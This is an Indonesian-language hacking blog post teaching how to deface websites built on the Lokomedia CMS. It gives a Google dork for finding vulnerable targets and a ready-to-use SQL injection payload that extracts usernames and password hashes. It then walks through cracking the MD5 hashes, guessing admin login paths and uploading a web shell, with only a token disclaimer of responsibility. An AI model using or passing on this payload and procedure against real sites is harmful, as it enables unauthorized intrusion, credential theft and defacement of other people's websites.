Jum'at 21 Juni 2019
Hallo bertemu lagi dengan admin di blog sederhana ini kali ini w mau kasih tahu deface metode sql lokomedia ok silahkan baca ya.
inurl:/statis-2-profil.html
kembangin lagi biar dapet yang fresh .
2.exploit : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
step by step :
- Pilih salah satu target
- Ni gw dah dapet target
- masukan exploit diatas contoh : target.co.il/statis--7'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+kantordesa.html
- lalu kalian tinggal view-source :
password dalam bentuk md5 maka harus di decrypt
link : https://hashkiller.co.uk/Cracker/MD5
jika sudah di hash ,tinggal login
untuk loginya bisa di :- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
nah kan itu uda masuk tinggal kalian upload shell /script deh
semoga membantu.
NB : admin tidak bertanggung jawab atas apa yang kalian perbuat alangkah baiknya jika dipath bugnya and hubungi adminya.
Ok sekian kali ini ,sampai jumpa kembali .
fp : https://www.facebook.com/baturajacrew1337/
NB : admin tidak bertanggung jawab atas apa yang kalian perbuat alangkah baiknya jika dipath bugnya and hubungi adminya.
Ok sekian kali ini ,sampai jumpa kembali .
fp : https://www.facebook.com/baturajacrew1337/
Komentar
Posting Komentar